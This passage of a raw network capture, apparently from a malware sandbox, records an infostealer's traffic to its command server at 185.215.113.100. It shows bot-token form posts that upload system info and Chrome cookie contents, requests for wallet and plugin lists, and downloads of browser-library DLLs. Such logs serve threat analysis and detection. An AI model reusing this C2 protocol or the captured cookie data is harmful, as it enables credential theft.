name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="message"fplugins------FIIIIDGHJEBFBGDHDGII--
Aug 29, 2024 15:42:48.259495974 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:48 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Aug 29, 2024 15:42:48.280742884 CEST	203	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJE Host: 185.215.113.100 Content-Length: 6671 Connection: Keep-Alive Cache-Control: no-cache
Aug 29, 2024 15:42:48.280805111 CEST	6671	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 Data Ascii: ------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Aug 29, 2024 15:42:49.113516092 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:48 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 29, 2024 15:42:49.370970964 CEST	94	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 29, 2024 15:42:49.611748934 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:49 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Aug 29, 2024 15:42:49.611763954 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Aug 29, 2024 15:42:50.920504093 CEST	953	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCB Host: 185.215.113.100 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------FIJECAEHJJJKJKFIDGCB--
Aug 29, 2024 15:42:51.733983040 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:51 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 29, 2024 15:42:51.852552891 CEST	565	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJE Host: 185.215.113.100 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file"------AKFHCAKJDBKKEBFIIJJE--
Aug 29, 2024 15:42:52.650727987 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:51 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 29, 2024 15:42:53.381294966 CEST	565	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC Host: 185.215.113.100 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="file"------GDGHJEHJJDAAAKEBGCFC--
Aug 29, 2024 15:42:54.233093977 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:53 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 29, 2024 15:42:54.634531975 CEST	94	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 29, 2024 15:42:54.874937057 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:54 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Aug 29, 2024 15:42:55.778376102 CEST	94	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 29, 2024 15:42:56.188612938 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:55 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Aug 29, 2024 15:42:56.416255951 CEST	95	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 29, 2024 15:42:56.658047915 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:56 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Aug 29, 2024 15:42:56.976397991 CEST	91	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 29, 2024 15:42:57.225778103 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:57 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Aug 29, 2024 15:42:58.634569883 CEST	95	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 29, 2024 15:42:58.878973007 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:58 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Aug 29, 2024 15:42:58.995589972 CEST	99	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 29, 2024 15:42:59.238440037 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:59 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Aug 29, 2024 15:42:59.706706047 CEST	203	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF Host: 185.215.113.100 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Aug 29, 2024 15:43:00.735932112 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:42:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 29, 2024 15:43:00.801202059 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBA Host: 185.215.113.100 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 2d 2d 0d 0a Data Ascii: ------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="message"wallets------FBKECFIIEHCFHIECAFBA--
